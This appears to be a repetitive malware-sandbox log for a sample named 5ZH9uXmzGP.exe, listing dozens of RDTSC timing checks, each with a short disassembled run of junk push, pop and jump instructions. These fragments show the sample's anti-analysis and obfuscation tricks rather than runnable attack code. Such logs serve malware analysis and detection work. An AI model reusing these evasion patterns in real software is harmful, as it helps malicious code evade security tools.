Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A8D6CD second address: A8D6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A8D6D1 second address: A8D6D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A8D6D5 second address: A8D6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FFA692CA422h 0x0000000e je 00007FFA692CA416h 0x00000014 ja 00007FFA692CA416h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A8D200 second address: A8D22D instructions: 0x00000000 rdtsc 0x00000002 js 00007FFA68B945B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FFA68B945C9h 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A8D47C second address: A8D480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A92995 second address: A9299A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A9299A second address: A929A9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFA692CA41Ah 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A929A9 second address: A929AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A92B35 second address: A92B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A92B3F second address: A92B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFA68B945C7h 0x0000000c jmp 00007FFA68B945BBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A92D03 second address: A92D16 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFA692CA41Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007FFA692CA416h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A92FF7 second address: A92FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A49A3A second address: A49A7D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFA692CA416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FFA692CA418h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push 00000004h 0x00000029 jmp 00007FFA692CA421h 0x0000002e nop 0x0000002f pushad 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A49A7D second address: A49ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA68B945C2h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FFA68B945C6h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007FFA68B945C8h 0x0000001d jmp 00007FFA68B945C2h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A93297 second address: A932A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A97F32 second address: A97F6C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFA68B945BCh 0x00000008 je 00007FFA68B945BEh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FFA68B945C6h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A97F6C second address: A97F88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FFA692CA424h 0x0000000e jmp 00007FFA692CA41Ch 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A97F88 second address: A97FC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA68B945BBh 0x00000008 jmp 00007FFA68B945BEh 0x0000000d jmp 00007FFA68B945C3h 0x00000012 popad 0x00000013 jo 00007FFA68B945C2h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A97FC0 second address: A97FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A98114 second address: A98119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A983F1 second address: A98401 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFA692CA416h 0x00000008 js 00007FFA692CA416h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A98401 second address: A9840D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FFA68B945B6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A9840D second address: A98411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A98411 second address: A9841A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A986B3 second address: A986BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A986BD second address: A986EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007FFA68B945C8h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jbe 00007FFA68B945B6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A986EE second address: A986F8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A986F8 second address: A98719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FFA68B945B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A98865 second address: A98876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 jnp 00007FFA692CA41Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A9BD19 second address: A9BD1F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A9B3BF second address: A9B3DE instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFA692CA416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFA692CA421h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A9B3DE second address: A9B3F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A9B3F9 second address: A9B427 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFA692CA422h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFA692CA422h 0x0000000f jne 00007FFA692CA416h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A9B568 second address: A9B573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A9B573 second address: A9B577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A9B9F4 second address: A9BA04 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFA68B945B8h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A9BA04 second address: A9BA0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA1376 second address: AA1384 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFA68B945B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA1384 second address: AA1388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA1388 second address: AA138C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA138C second address: AA1392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA1392 second address: AA13A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jng 00007FFA68B945BAh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA14C3 second address: AA150A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA692CA422h 0x00000009 jnl 00007FFA692CA416h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007FFA692CA428h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FFA692CA41Dh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA150A second address: AA152E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFA68B945C7h 0x0000000c jnc 00007FFA68B945B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA1660 second address: AA167E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 jmp 00007FFA692CA423h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA167E second address: AA1682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA1C32 second address: AA1C37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA262D second address: AA263E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FFA68B945B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA2BB8 second address: AA2BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA2BBC second address: AA2BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA2BC0 second address: AA2BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFA692CA416h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FFA692CA41Bh 0x00000011 pop edi 0x00000012 jl 00007FFA692CA444h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA2BE2 second address: AA2BE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA2BE6 second address: AA2C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FFA692CA426h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA2EFA second address: AA2EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA4864 second address: AA486A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA486A second address: AA4884 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AA9F42 second address: AA9F4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FFA692CA416h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AADF45 second address: AADF49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AACF48 second address: AACF67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FFA692CA416h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push ebx 0x0000000e push ecx 0x0000000f jmp 00007FFA692CA41Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AACF67 second address: AACF74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007FFA68B945C2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AACF74 second address: AACF7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AAD0C3 second address: AAD0D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FFA68B945BFh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AAD0D7 second address: AAD146 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA692CA424h 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007FFA692CA416h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FFA692CA426h 0x00000017 jmp 00007FFA692CA421h 0x0000001c jmp 00007FFA692CA426h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c jp 00007FFA692CA416h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AAD146 second address: AAD16C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C4h 0x00000007 jno 00007FFA68B945B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FFA68B945BCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AAD16C second address: AAD170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AAD2AB second address: AAD2B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AAD2B2 second address: AAD2C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jc 00007FFA692CA41Ah 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AAD439 second address: AAD443 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFA68B945B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AAD443 second address: AAD449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AAD449 second address: AAD44F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AAD44F second address: AAD453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AAD453 second address: AAD459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AAD459 second address: AAD464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AAD464 second address: AAD46A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AAD46A second address: AAD4A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA692CA428h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FFA692CA426h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AAD93F second address: AAD943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AAD943 second address: AAD947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AAD947 second address: AAD957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFA68B945BAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AADC1E second address: AADC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AADC22 second address: AADC26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AADC26 second address: AADC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FFA692CA41Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFA692CA427h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AB4C9F second address: AB4CF0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFA68B945B6h 0x00000008 jmp 00007FFA68B945C5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jnp 00007FFA68B945B6h 0x00000016 jnc 00007FFA68B945B6h 0x0000001c jno 00007FFA68B945B6h 0x00000022 popad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push eax 0x00000028 pop eax 0x00000029 jmp 00007FFA68B945C7h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AB4FCC second address: AB4FD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AB5123 second address: AB5165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FFA68B945B6h 0x0000000c popad 0x0000000d jmp 00007FFA68B945C3h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FFA68B945C8h 0x00000019 je 00007FFA68B945B8h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AB5165 second address: AB5186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FFA692CA416h 0x0000000a jmp 00007FFA692CA427h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AB569E second address: AB56DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c jmp 00007FFA68B945C5h 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007FFA68B945BEh 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jnc 00007FFA68B945B6h 0x00000021 popad 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: ABCACE second address: ABCAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: ABCAD7 second address: ABCADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
